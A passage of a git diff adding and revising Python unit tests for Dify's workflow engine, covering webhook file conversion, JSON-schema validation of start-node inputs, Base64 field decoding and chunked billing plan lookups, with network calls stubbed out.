@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_disabled_mode_skips_node_end(self, memory_span_exporter, mock_llm_node): + """Test that disabled layer doesn't process node end.""" + layer = ObservabilityLayer() + assert layer._is_disabled + + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 diff --git a/api/tests/unit_tests/core/workflow/nodes/test_start_node_json_object.py b/api/tests/unit_tests/core/workflow/nodes/test_start_node_json_object.py index 83799c9508..539e72edb5 100644 --- a/api/tests/unit_tests/core/workflow/nodes/test_start_node_json_object.py +++ b/api/tests/unit_tests/core/workflow/nodes/test_start_node_json_object.py @@ -1,3 +1,4 @@ +import json import time import pytest @@ -46,14 +47,16 @@ def make_start_node(user_inputs, variables): def test_json_object_valid_schema(): - schema = { - "type": "object", - "properties": { - "age": {"type": "number"}, - "name": {"type": "string"}, - }, - "required": ["age"], - } + schema = json.dumps( + { + "type": "object", + "properties": { + "age": {"type": "number"}, + "name": {"type": "string"}, + }, + "required": ["age"], + } + ) variables = [ VariableEntity( @@ -65,7 +68,7 @@ def test_json_object_valid_schema(): ) ] - user_inputs = {"profile": {"age": 20, "name": "Tom"}} + user_inputs = {"profile": json.dumps({"age": 20, "name": "Tom"})} node = make_start_node(user_inputs, variables) result = node._run() @@ -74,12 +77,23 @@ def test_json_object_valid_schema(): def test_json_object_invalid_json_string(): + schema = json.dumps( + { + "type": "object", + "properties": { + "age": {"type": "number"}, + "name": {"type": "string"}, + }, + "required": ["age", "name"], + } + ) variables = [ VariableEntity( variable="profile", label="profile", type=VariableEntityType.JSON_OBJECT, required=True, + json_schema=schema, ) ] @@ -88,38 
+102,21 @@ def test_json_object_invalid_json_string(): node = make_start_node(user_inputs, variables) - with pytest.raises(ValueError, match="profile must be a JSON object"): - node._run() - - -@pytest.mark.parametrize("value", ["[1, 2, 3]", "123"]) -def test_json_object_valid_json_but_not_object(value): - variables = [ - VariableEntity( - variable="profile", - label="profile", - type=VariableEntityType.JSON_OBJECT, - required=True, - ) - ] - - user_inputs = {"profile": value} - - node = make_start_node(user_inputs, variables) - - with pytest.raises(ValueError, match="profile must be a JSON object"): + with pytest.raises(ValueError, match='{"age": 20, "name": "Tom" must be a valid JSON object'): node._run() def test_json_object_does_not_match_schema(): - schema = { - "type": "object", - "properties": { - "age": {"type": "number"}, - "name": {"type": "string"}, - }, - "required": ["age", "name"], - } + schema = json.dumps( + { + "type": "object", + "properties": { + "age": {"type": "number"}, + "name": {"type": "string"}, + }, + "required": ["age", "name"], + } + ) variables = [ VariableEntity( @@ -132,7 +129,7 @@ def test_json_object_does_not_match_schema(): ] # age is a string, which violates the schema (expects number) - user_inputs = {"profile": {"age": "twenty", "name": "Tom"}} + user_inputs = {"profile": json.dumps({"age": "twenty", "name": "Tom"})} node = make_start_node(user_inputs, variables) @@ -141,14 +138,16 @@ def test_json_object_does_not_match_schema(): def test_json_object_missing_required_schema_field(): - schema = { - "type": "object", - "properties": { - "age": {"type": "number"}, - "name": {"type": "string"}, - }, - "required": ["age", "name"], - } + schema = json.dumps( + { + "type": "object", + "properties": { + "age": {"type": "number"}, + "name": {"type": "string"}, + }, + "required": ["age", "name"], + } + ) variables = [ VariableEntity( @@ -161,7 +160,7 @@ def test_json_object_missing_required_schema_field(): ] # Missing required field 
"name" - user_inputs = {"profile": {"age": 20}} + user_inputs = {"profile": json.dumps({"age": 20})} node = make_start_node(user_inputs, variables) @@ -214,7 +213,7 @@ def test_json_object_optional_variable_not_provided(): variable="profile", label="profile", type=VariableEntityType.JSON_OBJECT, - required=False, + required=True, ) ] @@ -223,5 +222,5 @@ def test_json_object_optional_variable_not_provided(): node = make_start_node(user_inputs, variables) # Current implementation raises a validation error even when the variable is optional - with pytest.raises(ValueError, match="profile must be a JSON object"): + with pytest.raises(ValueError, match="profile is required in input form"): node._run() diff --git a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py new file mode 100644 index 0000000000..ead2334473 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py @@ -0,0 +1,452 @@ +""" +Unit tests for webhook file conversion fix. + +This test verifies that webhook trigger nodes properly convert file dictionaries +to FileVariable objects, fixing the "Invalid variable type: ObjectVariable" error +when passing files to downstream LLM nodes. 
+""" + +from unittest.mock import Mock, patch + +from core.app.entities.app_invoke_entities import InvokeFrom +from core.workflow.entities.graph_init_params import GraphInitParams +from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus +from core.workflow.nodes.trigger_webhook.entities import ( + ContentType, + Method, + WebhookBodyParameter, + WebhookData, +) +from core.workflow.nodes.trigger_webhook.node import TriggerWebhookNode +from core.workflow.runtime.graph_runtime_state import GraphRuntimeState +from core.workflow.runtime.variable_pool import VariablePool +from core.workflow.system_variable import SystemVariable +from models.enums import UserFrom +from models.workflow import WorkflowType + + +def create_webhook_node( + webhook_data: WebhookData, + variable_pool: VariablePool, + tenant_id: str = "test-tenant", +) -> TriggerWebhookNode: + """Helper function to create a webhook node with proper initialization.""" + node_config = { + "id": "webhook-node-1", + "data": webhook_data.model_dump(), + } + + graph_init_params = GraphInitParams( + tenant_id=tenant_id, + app_id="test-app", + workflow_type=WorkflowType.WORKFLOW, + workflow_id="test-workflow", + graph_config={}, + user_id="test-user", + user_from=UserFrom.ACCOUNT, + invoke_from=InvokeFrom.SERVICE_API, + call_depth=0, + ) + + runtime_state = GraphRuntimeState( + variable_pool=variable_pool, + start_at=0, + ) + + node = TriggerWebhookNode( + id="webhook-node-1", + config=node_config, + graph_init_params=graph_init_params, + graph_runtime_state=runtime_state, + ) + + # Attach a lightweight app_config onto runtime state for tenant lookups + runtime_state.app_config = Mock() + runtime_state.app_config.tenant_id = tenant_id + + # Provide compatibility alias expected by node implementation + # Some nodes reference `self.node_id`; expose it as an alias to `self.id` for tests + node.node_id = node.id + + return node + + +def create_test_file_dict( + filename: str = "test.jpg", + 
file_type: str = "image", + transfer_method: str = "local_file", +) -> dict: + """Create a test file dictionary as it would come from webhook service.""" + return { + "id": "file-123", + "tenant_id": "test-tenant", + "type": file_type, + "filename": filename, + "extension": ".jpg", + "mime_type": "image/jpeg", + "transfer_method": transfer_method, + "related_id": "related-123", + "storage_key": "storage-key-123", + "size": 1024, + "url": "https://example.com/test.jpg", + "created_at": 1234567890, + "used_at": None, + "hash": "file-hash-123", + } + + +def test_webhook_node_file_conversion_to_file_variable(): + """Test that webhook node converts file dictionaries to FileVariable objects.""" + # Create test file dictionary (as it comes from webhook service) + file_dict = create_test_file_dict("uploaded_image.jpg") + + data = WebhookData( + title="Test Webhook with File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="image_upload", type="file", required=True), + WebhookBodyParameter(name="message", type="string", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {"message": "Test message"}, + "files": { + "image_upload": file_dict, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Mock the file factory and variable factory + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks + mock_file_obj = Mock() + mock_file_obj.to_dict.return_value = file_dict + mock_file_factory.return_value = mock_file_obj + + mock_segment = Mock() + mock_segment.value = mock_file_obj + mock_segment_factory.return_value = mock_segment + + 
mock_file_var_instance = Mock() + mock_file_variable.return_value = mock_file_var_instance + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify file factory was called with correct parameters + mock_file_factory.assert_called_once_with( + mapping=file_dict, + tenant_id="test-tenant", + ) + + # Verify segment factory was called to create FileSegment + mock_segment_factory.assert_called_once() + + # Verify FileVariable was created with correct parameters + mock_file_variable.assert_called_once() + call_args = mock_file_variable.call_args[1] + assert call_args["name"] == "image_upload" + # value should be whatever build_segment_with_type.value returned + assert call_args["value"] == mock_segment.value + assert call_args["selector"] == ["webhook-node-1", "image_upload"] + + # Verify output contains the FileVariable, not the original dict + assert result.outputs["image_upload"] == mock_file_var_instance + assert result.outputs["message"] == "Test message" + + +def test_webhook_node_file_conversion_with_missing_files(): + """Test webhook node file conversion with missing file parameter.""" + data = WebhookData( + title="Test Webhook with Missing File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="missing_file", type="file", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": {}, # No files + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle None case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify missing file parameter is None + assert result.outputs["_webhook_raw"]["files"] == {} + + +def 
test_webhook_node_file_conversion_with_none_file(): + """Test webhook node file conversion with None file value.""" + data = WebhookData( + title="Test Webhook with None File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="none_file", type="file", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": None, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle None case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify None file parameter is None + assert result.outputs["_webhook_raw"]["files"]["file"] is None + + +def test_webhook_node_file_conversion_with_non_dict_file(): + """Test webhook node file conversion with non-dict file value.""" + data = WebhookData( + title="Test Webhook with Non-Dict File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="wrong_type", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": "not_a_dict", # Wrapped to match node expectation + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle non-dict case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify fallback to original (wrapped) mapping + assert result.outputs["_webhook_raw"]["files"]["file"] == "not_a_dict" + + +def test_webhook_node_file_conversion_mixed_parameters(): + """Test webhook node with mixed parameter types including 
files.""" + file_dict = create_test_file_dict("mixed_test.jpg") + + data = WebhookData( + title="Test Webhook Mixed Parameters", + method=Method.POST, + content_type=ContentType.FORM_DATA, + headers=[], + params=[], + body=[ + WebhookBodyParameter(name="text_param", type="string", required=True), + WebhookBodyParameter(name="number_param", type="number", required=False), + WebhookBodyParameter(name="file_param", type="file", required=True), + WebhookBodyParameter(name="bool_param", type="boolean", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": { + "text_param": "Hello World", + "number_param": 42, + "bool_param": True, + }, + "files": { + "file_param": file_dict, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks for file + mock_file_obj = Mock() + mock_file_factory.return_value = mock_file_obj + + mock_segment = Mock() + mock_segment.value = mock_file_obj + mock_segment_factory.return_value = mock_segment + + mock_file_var = Mock() + mock_file_variable.return_value = mock_file_var + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify all parameters are present + assert result.outputs["text_param"] == "Hello World" + assert result.outputs["number_param"] == 42 + assert result.outputs["bool_param"] is True + assert result.outputs["file_param"] == mock_file_var + + # Verify file conversion was called + mock_file_factory.assert_called_once_with( + mapping=file_dict, + tenant_id="test-tenant", + ) + + +def 
test_webhook_node_different_file_types(): + """Test webhook node file conversion with different file types.""" + image_dict = create_test_file_dict("image.jpg", "image") + + data = WebhookData( + title="Test Webhook Different File Types", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="image", type="file", required=True), + WebhookBodyParameter(name="document", type="file", required=True), + WebhookBodyParameter(name="video", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "image": image_dict, + "document": create_test_file_dict("document.pdf", "document"), + "video": create_test_file_dict("video.mp4", "video"), + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks for all files + mock_file_objs = [Mock() for _ in range(3)] + mock_segments = [Mock() for _ in range(3)] + mock_file_vars = [Mock() for _ in range(3)] + + # Map each segment.value to its corresponding mock file obj + for seg, f in zip(mock_segments, mock_file_objs): + seg.value = f + + mock_file_factory.side_effect = mock_file_objs + mock_segment_factory.side_effect = mock_segments + mock_file_variable.side_effect = mock_file_vars + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify all file types were converted + assert mock_file_factory.call_count == 3 + assert result.outputs["image"] == mock_file_vars[0] + assert result.outputs["document"] == mock_file_vars[1] + assert 
result.outputs["video"] == mock_file_vars[2] + + +def test_webhook_node_file_conversion_with_non_dict_wrapper(): + """Test webhook node file conversion when the file wrapper is not a dict.""" + data = WebhookData( + title="Test Webhook with Non-dict File Wrapper", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="non_dict_wrapper", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": "just a string", + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + result = node._run() + + # Verify successful execution (should not crash) + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + # Verify fallback to original value + assert result.outputs["_webhook_raw"]["files"]["file"] == "just a string" diff --git a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py index a599d4f831..bbb5511923 100644 --- a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py +++ b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py @@ -1,8 +1,10 @@ +from unittest.mock import patch + import pytest from core.app.entities.app_invoke_entities import InvokeFrom from core.file import File, FileTransferMethod, FileType -from core.variables import StringVariable +from core.variables import FileVariable, StringVariable from core.workflow.entities.graph_init_params import GraphInitParams from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus from core.workflow.nodes.trigger_webhook.entities import ( @@ -27,26 +29,34 @@ def create_webhook_node(webhook_data: WebhookData, variable_pool: VariablePool) "data": webhook_data.model_dump(), } + graph_init_params = GraphInitParams( + tenant_id="1", + app_id="1", 
+ workflow_type=WorkflowType.WORKFLOW, + workflow_id="1", + graph_config={}, + user_id="1", + user_from=UserFrom.ACCOUNT, + invoke_from=InvokeFrom.SERVICE_API, + call_depth=0, + ) + runtime_state = GraphRuntimeState( + variable_pool=variable_pool, + start_at=0, + ) node = TriggerWebhookNode( id="1", config=node_config, - graph_init_params=GraphInitParams( - tenant_id="1", - app_id="1", - workflow_type=WorkflowType.WORKFLOW, - workflow_id="1", - graph_config={}, - user_id="1", - user_from=UserFrom.ACCOUNT, - invoke_from=InvokeFrom.SERVICE_API, - call_depth=0, - ), - graph_runtime_state=GraphRuntimeState( - variable_pool=variable_pool, - start_at=0, - ), + graph_init_params=graph_init_params, + graph_runtime_state=runtime_state, ) + # Provide tenant_id for conversion path + runtime_state.app_config = type("_AppCfg", (), {"tenant_id": "1"})() + + # Compatibility alias for some nodes referencing `self.node_id` + node.node_id = node.id + return node @@ -246,20 +256,27 @@ def test_webhook_node_run_with_file_params(): "query_params": {}, "body": {}, "files": { - "upload": file1, - "document": file2, + "upload": file1.to_dict(), + "document": file2.to_dict(), }, } }, ) node = create_webhook_node(data, variable_pool) - result = node._run() + # Mock the file factory to avoid DB-dependent validation on upload_file_id + with patch("factories.file_factory.build_from_mapping") as mock_file_factory: + + def _to_file(mapping, tenant_id, config=None, strict_type_validation=False): + return File.model_validate(mapping) + + mock_file_factory.side_effect = _to_file + result = node._run() assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED - assert result.outputs["upload"] == file1 - assert result.outputs["document"] == file2 - assert result.outputs["missing_file"] is None + assert isinstance(result.outputs["upload"], FileVariable) + assert isinstance(result.outputs["document"], FileVariable) + assert result.outputs["upload"].value.filename == "image.jpg" def 
test_webhook_node_run_mixed_parameters(): @@ -291,19 +308,27 @@ def test_webhook_node_run_mixed_parameters(): "headers": {"Authorization": "Bearer token"}, "query_params": {"version": "v1"}, "body": {"message": "Test message"}, - "files": {"upload": file_obj}, + "files": {"upload": file_obj.to_dict()}, } }, ) node = create_webhook_node(data, variable_pool) - result = node._run() + # Mock the file factory to avoid DB-dependent validation on upload_file_id + with patch("factories.file_factory.build_from_mapping") as mock_file_factory: + + def _to_file(mapping, tenant_id, config=None, strict_type_validation=False): + return File.model_validate(mapping) + + mock_file_factory.side_effect = _to_file + result = node._run() assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED assert result.outputs["Authorization"] == "Bearer token" assert result.outputs["version"] == "v1" assert result.outputs["message"] == "Test message" - assert result.outputs["upload"] == file_obj + assert isinstance(result.outputs["upload"], FileVariable) + assert result.outputs["upload"].value.filename == "test.jpg" assert "_webhook_raw" in result.outputs diff --git a/api/tests/unit_tests/core/workflow/test_workflow_entry.py b/api/tests/unit_tests/core/workflow/test_workflow_entry.py index 75de5c455f..68d6c109e8 100644 --- a/api/tests/unit_tests/core/workflow/test_workflow_entry.py +++ b/api/tests/unit_tests/core/workflow/test_workflow_entry.py @@ -1,3 +1,5 @@ +from types import SimpleNamespace + import pytest from core.file.enums import FileType @@ -12,6 +14,36 @@ from core.workflow.system_variable import SystemVariable from core.workflow.workflow_entry import WorkflowEntry +@pytest.fixture(autouse=True) +def _mock_ssrf_head(monkeypatch): + """Avoid any real network requests during tests. + + file_factory._get_remote_file_info() uses ssrf_proxy.head to inspect + remote files. We stub it to return a minimal response object with + headers so filename/mime/size can be derived deterministically. 
+    def fake_head(url, *args, **kwargs):
+        # choose a content-type by file suffix for determinism
+        if url.endswith(".pdf"):
+            ctype = "application/pdf"
+        elif url.endswith(".jpg") or url.endswith(".jpeg"):
+            ctype = "image/jpeg"
+        elif url.endswith(".png"):
+            ctype = "image/png"
+        else:
+            ctype = "application/octet-stream"
+        filename = url.split("/")[-1] or "file.bin"
+        headers = {
+            "Content-Type": ctype,
+            "Content-Disposition": f'attachment; filename="{filename}"',
+            "Content-Length": "12345",
+        }
+        return SimpleNamespace(status_code=200, headers=headers)
+
+    monkeypatch.setattr("core.helper.ssrf_proxy.head", fake_head)
+
+
 class TestWorkflowEntry:
     """Test WorkflowEntry class methods."""
diff --git a/api/tests/unit_tests/libs/test_encryption.py b/api/tests/unit_tests/libs/test_encryption.py
new file mode 100644
index 0000000000..bf013c4bae
--- /dev/null
+++ b/api/tests/unit_tests/libs/test_encryption.py
@@ -0,0 +1,150 @@
+"""
+Unit tests for field encoding/decoding utilities.
+
+These tests verify Base64 encoding/decoding functionality and
+proper error handling and fallback behavior.
+""" + +import base64 + +from libs.encryption import FieldEncryption + + +class TestDecodeField: + """Test cases for field decoding functionality.""" + + def test_decode_valid_base64(self): + """Test decoding a valid Base64 encoded string.""" + plaintext = "password123" + encoded = base64.b64encode(plaintext.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_field(encoded) + assert result == plaintext + + def test_decode_non_base64_returns_none(self): + """Test that non-base64 input returns None.""" + non_base64 = "plain-password-!@#" + result = FieldEncryption.decrypt_field(non_base64) + # Should return None (decoding failed) + assert result is None + + def test_decode_unicode_text(self): + """Test decoding Base64 encoded Unicode text.""" + plaintext = "密码Test123" + encoded = base64.b64encode(plaintext.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_field(encoded) + assert result == plaintext + + def test_decode_empty_string(self): + """Test decoding an empty string returns empty string.""" + result = FieldEncryption.decrypt_field("") + # Empty string base64 decodes to empty string + assert result == "" + + def test_decode_special_characters(self): + """Test decoding with special characters.""" + plaintext = "P@ssw0rd!#$%^&*()" + encoded = base64.b64encode(plaintext.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_field(encoded) + assert result == plaintext + + +class TestDecodePassword: + """Test cases for password decoding.""" + + def test_decode_password_base64(self): + """Test decoding a Base64 encoded password.""" + password = "SecureP@ssw0rd!" 
+ encoded = base64.b64encode(password.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_password(encoded) + assert result == password + + def test_decode_password_invalid_returns_none(self): + """Test that invalid base64 passwords return None.""" + invalid = "PlainPassword!@#" + result = FieldEncryption.decrypt_password(invalid) + # Should return None (decoding failed) + assert result is None + + +class TestDecodeVerificationCode: + """Test cases for verification code decoding.""" + + def test_decode_code_base64(self): + """Test decoding a Base64 encoded verification code.""" + code = "789012" + encoded = base64.b64encode(code.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_verification_code(encoded) + assert result == code + + def test_decode_code_invalid_returns_none(self): + """Test that invalid base64 codes return None.""" + invalid = "123456" # Plain 6-digit code, not base64 + result = FieldEncryption.decrypt_verification_code(invalid) + # Should return None (decoding failed) + assert result is None + + +class TestRoundTripEncodingDecoding: + """ + Integration tests for complete encoding-decoding cycle. + These tests simulate the full frontend-to-backend flow using Base64. + """ + + def test_roundtrip_password(self): + """Test encoding and decoding a password.""" + original_password = "SecureP@ssw0rd!" 
+ + # Simulate frontend encoding (Base64) + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + + # Backend decoding + decoded = FieldEncryption.decrypt_password(encoded) + + assert decoded == original_password + + def test_roundtrip_verification_code(self): + """Test encoding and decoding a verification code.""" + original_code = "123456" + + # Simulate frontend encoding + encoded = base64.b64encode(original_code.encode("utf-8")).decode() + + # Backend decoding + decoded = FieldEncryption.decrypt_verification_code(encoded) + + assert decoded == original_code + + def test_roundtrip_unicode_password(self): + """Test encoding and decoding password with Unicode characters.""" + original_password = "密码Test123!@#" + + # Frontend encoding + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + + # Backend decoding + decoded = FieldEncryption.decrypt_password(encoded) + + assert decoded == original_password + + def test_roundtrip_long_password(self): + """Test encoding and decoding a long password.""" + original_password = "ThisIsAVeryLongPasswordWithLotsOfCharacters123!@#$%^&*()" + + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + decoded = FieldEncryption.decrypt_password(encoded) + + assert decoded == original_password + + def test_roundtrip_with_whitespace(self): + """Test encoding and decoding with whitespace.""" + original_password = "pass word with spaces" + + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + decoded = FieldEncryption.decrypt_field(encoded) + + assert decoded == original_password diff --git a/api/tests/unit_tests/oss/__mock/base.py b/api/tests/unit_tests/oss/__mock/base.py index 974c462289..5bde461d94 100644 --- a/api/tests/unit_tests/oss/__mock/base.py +++ b/api/tests/unit_tests/oss/__mock/base.py @@ -14,7 +14,9 @@ def get_example_bucket() -> str: def get_opendal_bucket() -> str: - return "./dify" + import os + + return os.environ.get("OPENDAL_FS_ROOT", 
"/tmp/dify-storage") def get_example_filename() -> str: diff --git a/api/tests/unit_tests/oss/opendal/test_opendal.py b/api/tests/unit_tests/oss/opendal/test_opendal.py index 2496aabbce..b83ad72b34 100644 --- a/api/tests/unit_tests/oss/opendal/test_opendal.py +++ b/api/tests/unit_tests/oss/opendal/test_opendal.py @@ -21,20 +21,16 @@ class TestOpenDAL: ) @pytest.fixture(scope="class", autouse=True) - def teardown_class(self, request): + def teardown_class(self): """Clean up after all tests in the class.""" - def cleanup(): - folder = Path(get_opendal_bucket()) - if folder.exists() and folder.is_dir(): - for item in folder.iterdir(): - if item.is_file(): - item.unlink() - elif item.is_dir(): - item.rmdir() - folder.rmdir() + yield - return cleanup() + folder = Path(get_opendal_bucket()) + if folder.exists() and folder.is_dir(): + import shutil + + shutil.rmtree(folder, ignore_errors=True) def test_save_and_exists(self): """Test saving data and checking existence.""" diff --git a/api/tests/unit_tests/services/test_billing_service.py b/api/tests/unit_tests/services/test_billing_service.py index 915aee3fa7..f50f744a75 100644 --- a/api/tests/unit_tests/services/test_billing_service.py +++ b/api/tests/unit_tests/services/test_billing_service.py @@ -1156,6 +1156,199 @@ class TestBillingServiceEdgeCases: assert "Only team owner or team admin can perform this action" in str(exc_info.value) +class TestBillingServiceSubscriptionOperations: + """Unit tests for subscription operations in BillingService. 
+ + Tests cover: + - Bulk plan retrieval with chunking + - Expired subscription cleanup whitelist retrieval + """ + + @pytest.fixture + def mock_send_request(self): + """Mock _send_request method.""" + with patch.object(BillingService, "_send_request") as mock: + yield mock + + def test_get_plan_bulk_with_empty_list(self, mock_send_request): + """Test bulk plan retrieval with empty tenant list.""" + # Arrange + tenant_ids = [] + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert + assert result == {} + mock_send_request.assert_not_called() + + def test_get_plan_bulk_with_chunking(self, mock_send_request): + """Test bulk plan retrieval with more than 200 tenants (chunking logic).""" + # Arrange - 250 tenants to test chunking (chunk_size = 200) + tenant_ids = [f"tenant-{i}" for i in range(250)] + + # First chunk: tenants 0-199 + first_chunk_response = { + "data": {f"tenant-{i}": {"plan": "sandbox", "expiration_date": 1735689600} for i in range(200)} + } + + # Second chunk: tenants 200-249 + second_chunk_response = { + "data": {f"tenant-{i}": {"plan": "professional", "expiration_date": 1767225600} for i in range(200, 250)} + } + + mock_send_request.side_effect = [first_chunk_response, second_chunk_response] + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert + assert len(result) == 250 + assert result["tenant-0"]["plan"] == "sandbox" + assert result["tenant-199"]["plan"] == "sandbox" + assert result["tenant-200"]["plan"] == "professional" + assert result["tenant-249"]["plan"] == "professional" + assert mock_send_request.call_count == 2 + + # Verify first chunk call + first_call = mock_send_request.call_args_list[0] + assert first_call[0][0] == "POST" + assert first_call[0][1] == "/subscription/plan/batch" + assert len(first_call[1]["json"]["tenant_ids"]) == 200 + + # Verify second chunk call + second_call = mock_send_request.call_args_list[1] + assert len(second_call[1]["json"]["tenant_ids"]) == 50 + + def 
test_get_plan_bulk_with_partial_batch_failure(self, mock_send_request): + """Test bulk plan retrieval when one batch fails but others succeed.""" + # Arrange - 250 tenants, second batch will fail + tenant_ids = [f"tenant-{i}" for i in range(250)] + + # First chunk succeeds + first_chunk_response = { + "data": {f"tenant-{i}": {"plan": "sandbox", "expiration_date": 1735689600} for i in range(200)} + } + + # Second chunk fails - need to create a mock that raises when called + def side_effect_func(*args, **kwargs): + if mock_send_request.call_count == 1: + return first_chunk_response + else: + raise ValueError("API error") + + mock_send_request.side_effect = side_effect_func + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert - should only have data from first batch + assert len(result) == 200 + assert result["tenant-0"]["plan"] == "sandbox" + assert result["tenant-199"]["plan"] == "sandbox" + assert "tenant-200" not in result + assert mock_send_request.call_count == 2 + + def test_get_plan_bulk_with_all_batches_failing(self, mock_send_request): + """Test bulk plan retrieval when all batches fail.""" + # Arrange + tenant_ids = [f"tenant-{i}" for i in range(250)] + + # All chunks fail + def side_effect_func(*args, **kwargs): + raise ValueError("API error") + + mock_send_request.side_effect = side_effect_func + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert - should return empty dict + assert result == {} + assert mock_send_request.call_count == 2 + + def test_get_plan_bulk_with_exactly_200_tenants(self, mock_send_request): + """Test bulk plan retrieval with exactly 200 tenants (boundary condition).""" + # Arrange + tenant_ids = [f"tenant-{i}" for i in range(200)] + mock_send_request.return_value = { + "data": {f"tenant-{i}": {"plan": "sandbox", "expiration_date": 1735689600} for i in range(200)} + } + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert + assert len(result) == 200 + assert 
